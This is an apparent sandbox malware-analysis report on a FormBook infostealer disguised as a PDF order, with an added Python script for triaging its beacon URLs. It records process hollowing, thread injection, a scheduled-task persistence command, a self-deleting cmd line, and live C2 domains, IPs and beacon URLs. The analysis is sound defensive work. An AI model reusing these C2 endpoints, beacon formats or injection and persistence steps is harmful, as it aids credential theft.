            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E214FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E38CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D658EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D69080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D80050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D80050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E22073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E31074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D8746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E3740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E3740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E3740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E34015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E34015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E18DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\cmmon32.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe | Domain query: www.mediatraining-toronto.com
            Source: C:\Windows\explorer.exe | Network Connect: 178.128.103.114 80
            Source: C:\Windows\explorer.exe | Domain query: www.thefuture101.com
            Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
            Source: C:\Windows\explorer.exe | Domain query: www.bluevistainvestments.com
            Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
            .NET source code references suspicious native API functions
            Source: Nuevo orden pdf.exe, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
            Source: Nuevo orden pdf.exe, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
            Source: NkwKQPLeekw.exe.0.dr, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
            Source: NkwKQPLeekw.exe.0.dr, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
            Source: 0.0.Nuevo orden pdf.exe.8c0000.0.unpack, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
            Source: 0.0.Nuevo orden pdf.exe.8c0000.0.unpack, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
            Source: 0.2.Nuevo orden pdf.exe.8c0000.0.unpack, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
            Source: 0.2.Nuevo orden pdf.exe.8c0000.0.unpack, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread register set: target process: 3388
            Source: C:\Windows\SysWOW64\cmmon32.exe | Thread register set: target process: 3388
            Queues an APC in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing technique
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 11A0000
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\NkwKQPLeekw' /XML 'C:\Users\user\AppData\Local\Temp\tmpA401.tmp'
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: explorer.exe, 00000007.00000000.232011691.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
            Source: explorer.exe, 00000007.00000000.233098169.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.481980206.0000000003580000.00000002.00000001.sdmp | Binary or memory string: Program Manager
            Source: explorer.exe, 00000007.00000000.233098169.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.481980206.0000000003580000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.233098169.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.481980206.0000000003580000.00000002.00000001.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.233098169.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.481980206.0000000003580000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Queries volume information: C:\Users\user\Desktop\Nuevo orden pdf.exe VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara match | File source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            Yara detected FormBook
            Source: Yara match | File source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 231 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Masquerading 1 | Input Capture 1 | Process Discovery 2 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | Shared Modules 1 | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 41 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 41 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 512 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 3 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Timestomp 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

            Behavior Graph

            [Behavior graph: rendered as an image on the original page; the data recoverable from it is listed below.]
            Behavior Graph ID: 404237 | Sample: Nuevo orden pdf.exe | Startdate: 04/05/2021 | Architecture: WINDOWS | Score: 100
            Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
            Process chain: Nuevo orden pdf.exe (started) -> RegSvcs.exe (started) and schtasks.exe (started) -> conhost.exe (started); RegSvcs.exe -> explorer.exe (injected) -> cmmon32.exe (started) -> cmd.exe (started) -> conhost.exe (started)
            Files dropped by Nuevo orden pdf.exe: NkwKQPLeekw.exe (PE32); NkwKQPLeekw.exe:Zone.Identifier (ASCII); tmpA401.tmp (XML); Nuevo orden pdf.exe.log (ASCII)
            RegSvcs.exe signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
            explorer.exe DNS/IP: thefuture101.com 178.128.103.114, 49728, 80 DIGITALOCEAN-ASNUS Netherlands; mediatraining-toronto.com 184.168.131.241, 49735, 80 AS-26496-GO-DADDY-COM-LLCUS United States; 5 other IPs or domains. Signature: System process connects to network (likely due to code injection or exploit)
            cmmon32.exe signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements

            Screenshots


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            Nuevo orden pdf.exe | 100% | Joe Sandbox ML |

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\NkwKQPLeekw.exe | 100% | Joe Sandbox ML |

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            6.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe (x3)
http://www.tiro.com | 0% | URL Reputation | safe (x3)
http://www.goodfont.co.kr | 0% | URL Reputation | safe (x3)
http://www.carterandcone.coml | 0% | URL Reputation | safe (x3)
http://www.sajatypeworks.com | 0% | URL Reputation | safe (x3)
http://www.typography.netD | 0% | URL Reputation | safe (x3)
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe (x3)
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe (x3)
http://fontfabrik.com | 0% | URL Reputation | safe (x3)
http://www.founder.com.cn/cn | 0% | URL Reputation | safe (x3)
http://www.mediatraining-toronto.com/sqxs/?Ef=GovnwUyBgs6xiYQW/zP+CA3Z06ENiLPJ6FoyDogwOk1ZQfWjapvzV/e42GR+qjeaq8An&ojl0d=RzuhPJ | 0% | Avira URL Cloud | safe
http://www.thefuture101.com/sqxs/?Ef=w0QgkeD38IHRIdpbCIGaty7sV88cqzXhWLmJ40eLjOUR8JRp45mybBQ5KmZt/1kyJcny&ojl0d=RzuhPJ | 0% | Avira URL Cloud | safe
http://www.bluevistainvestments.com/sqxs/?Ef=rJ59qlVpBd2p2MzE9PeUClXd0JALEtveJTDdwZJeh/IadIDZ7Pe72xE/unf7IFRjfuAh&ojl0d=RzuhPJ | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe (x3)
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe (x3)
http://www.sandoll.co.kr | 0% | URL Reputation | safe (x3)
www.lovetarot.online/sqxs/ | 100% | Avira URL Cloud | malware
http://www.urwpp.deDPlease | 0% | URL Reputation | safe (x3)
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe (x3)
http://www.sakkal.com | 0% | URL Reputation | safe (x3)

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mediatraining-toronto.com | 184.168.131.241 | true | true | - | unknown
thefuture101.com | 178.128.103.114 | true | true | - | unknown
bluevistainvestments.com | 34.102.136.180 | true | false | - | unknown
www.mediatraining-toronto.com | unknown | unknown | true | - | unknown
www.thefuture101.com | unknown | unknown | true | - | unknown
www.bluevistainvestments.com | unknown | unknown | true | - | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.mediatraining-toronto.com/sqxs/?Ef=GovnwUyBgs6xiYQW/zP+CA3Z06ENiLPJ6FoyDogwOk1ZQfWjapvzV/e42GR+qjeaq8An&ojl0d=RzuhPJ | true | Avira URL Cloud: safe | unknown
http://www.thefuture101.com/sqxs/?Ef=w0QgkeD38IHRIdpbCIGaty7sV88cqzXhWLmJ40eLjOUR8JRp45mybBQ5KmZt/1kyJcny&ojl0d=RzuhPJ | true | Avira URL Cloud: safe | unknown
http://www.bluevistainvestments.com/sqxs/?Ef=rJ59qlVpBd2p2MzE9PeUClXd0JALEtveJTDdwZJeh/IadIDZ7Pe72xE/unf7IFRjfuAh&ojl0d=RzuhPJ | false | Avira URL Cloud: safe | unknown
www.lovetarot.online/sqxs/ | true | Avira URL Cloud: malware | low
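All three beacons above share the path /sqxs/ and the constant parameter ojl0d=RzuhPJ while the long parameter changes per request, and the configuration C2 www.lovetarot.online/sqxs/ shares only the path. The following added example (not part of the Joe Sandbox report) turns that observation into code: it classifies a URL by that two-parameter shape, derives the markers the confirmed beacons share, and pivots on them host-agnostically. Inputs are URLs from this page, including beacons of related samples from the Joe Sandbox View section further down; the path/parameter patterns and length thresholds are assumptions fitted to those URLs, not a FormBook specification.

```python
"""Triage of the beacon URLs reported for this sample.

Added example, not part of the Joe Sandbox report. The URL lists below are
copied from this report (Contacted URLs, and the related samples in the
Joe Sandbox View section); the shape heuristics and thresholds are the
author's assumptions drawn from those URLs, not FormBook's specification.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

# Beacons this sample sent (report: Contacted URLs).
SAMPLE_BEACONS = [
    "http://www.mediatraining-toronto.com/sqxs/?Ef=GovnwUyBgs6xiYQW/zP+CA3Z06ENiLPJ6FoyDogwOk1ZQfWjapvzV/e42GR+qjeaq8An&ojl0d=RzuhPJ",
    "http://www.thefuture101.com/sqxs/?Ef=w0QgkeD38IHRIdpbCIGaty7sV88cqzXhWLmJ40eLjOUR8JRp45mybBQ5KmZt/1kyJcny&ojl0d=RzuhPJ",
    "http://www.bluevistainvestments.com/sqxs/?Ef=rJ59qlVpBd2p2MzE9PeUClXd0JALEtveJTDdwZJeh/IadIDZ7Pe72xE/unf7IFRjfuAh&ojl0d=RzuhPJ",
]
# C2 from the extracted configuration (report: Contacted URLs, no query observed).
CONFIG_C2 = "www.lovetarot.online/sqxs/"
# Beacons of related samples (report: Joe Sandbox View, IPs context).
RELATED = [
    "www.palomachurch.com/8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P",
    "www.shoprodeovegas.com/xcl/?DVodV=VtxhA2oX1n1prL&aRm4ZbJP=Q4feKhQOcUvJUP8oz4L5oOA8XtI+UFUMw1FgXJ9gQG3EsyP4HUo30rkjHaPboD73BEgI",
    "www.abundando.com/8u3b/?Mz=ltx0qfi0x45&WBZXQ8j=VA7b8QnIVeQJLb4vJ/jdAFdrsC+XTLKBbUdPfJTqVxRnd+9E52kRPAdLCgwgRBmqlhQAqg==",
]
# From the same context list, but a three-parameter query: a different beacon shape.
OTHER_SHAPE = "www.politicalnobody.com/.q0os/?action=fbgen&v=110&crc=669"

PATH_RE = re.compile(r"^/[A-Za-z0-9.\-]{2,6}/$")        # short random directory token
PAYLOAD_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")   # long base64-looking blob
KEY_RE = re.compile(r"^[A-Za-z0-9]{4,20}$")              # short constant value


def split_query(query):
    """Split k=v&k=v without decoding: parse_qsl would turn '+' into a space
    and corrupt the base64-looking payload."""
    pairs = []
    for part in query.split("&"):
        if part:
            k, _, v = part.partition("=")
            pairs.append((k, v))
    return pairs


def parse_beacon(url):
    if "://" not in url:
        url = "http://" + url  # the report lists some URLs without a scheme
    s = urlsplit(url)
    return {"host": s.hostname, "path": s.path, "params": split_query(s.query)}


def classify(url):
    """Does the URL have the two-parameter beacon shape: short path token,
    one long base64-looking value, one short constant value?"""
    b = parse_beacon(url)
    out = {"match": False, "host": b["host"], "path": b["path"],
           "payload_param": None, "key_param": None}
    if not PATH_RE.match(b["path"]) or len(b["params"]) != 2:
        return out
    payload = [p for p in b["params"] if PAYLOAD_RE.match(p[1])]
    key = [p for p in b["params"] if KEY_RE.match(p[1])]
    if len(payload) == 1 and len(key) == 1:
        out.update(match=True, payload_param=payload[0][0], key_param=key[0])
    return out


def campaign_markers(urls):
    """What the confirmed beacons share: the path token and the constant
    key=value pair. Returns None unless every matched beacon agrees."""
    hits = [c for c in map(classify, urls) if c["match"]]
    if not hits:
        return None
    (path, n_path), = Counter(c["path"] for c in hits).most_common(1)
    (key, n_key), = Counter(c["key_param"] for c in hits).most_common(1)
    if n_path != len(hits) or n_key != len(hits):
        return None
    return {"path": path, "key_param": key,
            "hosts": sorted({c["host"] for c in hits})}


def same_campaign(url, markers):
    """Host-agnostic pivot: same path token and, if a query is present,
    the same constant key=value pair."""
    b = parse_beacon(url)
    if b["path"] != markers["path"]:
        return False
    return not b["params"] or markers["key_param"] in b["params"]


if __name__ == "__main__":
    m = campaign_markers(SAMPLE_BEACONS)
    print("campaign markers:", m)
    for u in [CONFIG_C2, *RELATED, OTHER_SHAPE]:
        print(f"{u[:40]:40} shape={classify(u)['match']} campaign={same_campaign(u, m)}")
```

The classifier is a campaign-shape check, not a family signature: the three-parameter beacon from the same context list (action=fbgen&v=110&crc=669) does not match it, and the related samples' beacons match the shape but not this sample's markers, because their path tokens and constant parameters differ.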

                        URLs from Memory and Binaries

Sources:
